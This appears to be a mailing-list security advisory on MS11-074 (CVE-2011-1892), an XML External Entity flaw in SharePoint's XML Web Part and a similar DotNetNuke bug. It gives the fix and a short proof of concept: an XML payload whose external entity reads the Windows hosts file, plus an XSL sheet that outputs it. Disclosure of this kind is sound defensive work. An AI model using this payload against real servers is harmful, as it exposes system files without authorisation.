Hello, Microsoft recently published MS11-074. This bulletin concerns mainly SharePoint (2007 and 2010) but CVE-2011-1892 applies too to Office Groove (client and server), Office Forms Server 2007 and Office Web Apps 2010. The vulnerability is a "XML External Entity Reference" one, as described in CWE-611 [1]. The vulnerable component is "XML Web Part" and the following image demonstrates the exploit on a SharePoint 2007 server [2]. DotNetNuke has quietly patched this summer a very similar vulnerability in its XML component (v6.0.0 is OK [3]). As described in Microsoft documentation [4], setting XmlReaderSettings::XmlResolver to NULL is enough to correct this bug. Simple PoC for SharePoint and DotNetNuke : -------------------------- XML --------------------------------- <!DOCTYPE doc [ <!ENTITY boom SYSTEM "c:\\windows\\system32\\drivers\\etc\\hosts"> ]> <doc>&boom;</doc> ----------------------------------------------------------------- -------------------------- XSL ---------------------------------- <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform";> <xsl:template match="/"> <xsl:apply-templates/> <xsl:value-of select="doc"/> </xsl:template> </xsl:stylesheet> ----------------------------------------------------------------- More details, in French, on my blog : http://goo.gl/hptbj 1: http://cwe.mitre.org/data/definitions/611.html 2: http://www.agarri.fr/docs/shpt-xee.png 3: http://dnnxml.codeplex.com/releases/view/62862 4: http://msdn.microsoft.com/en-us/library/ms172415.aspx Regards, Nicolas Grégoire / Agarri
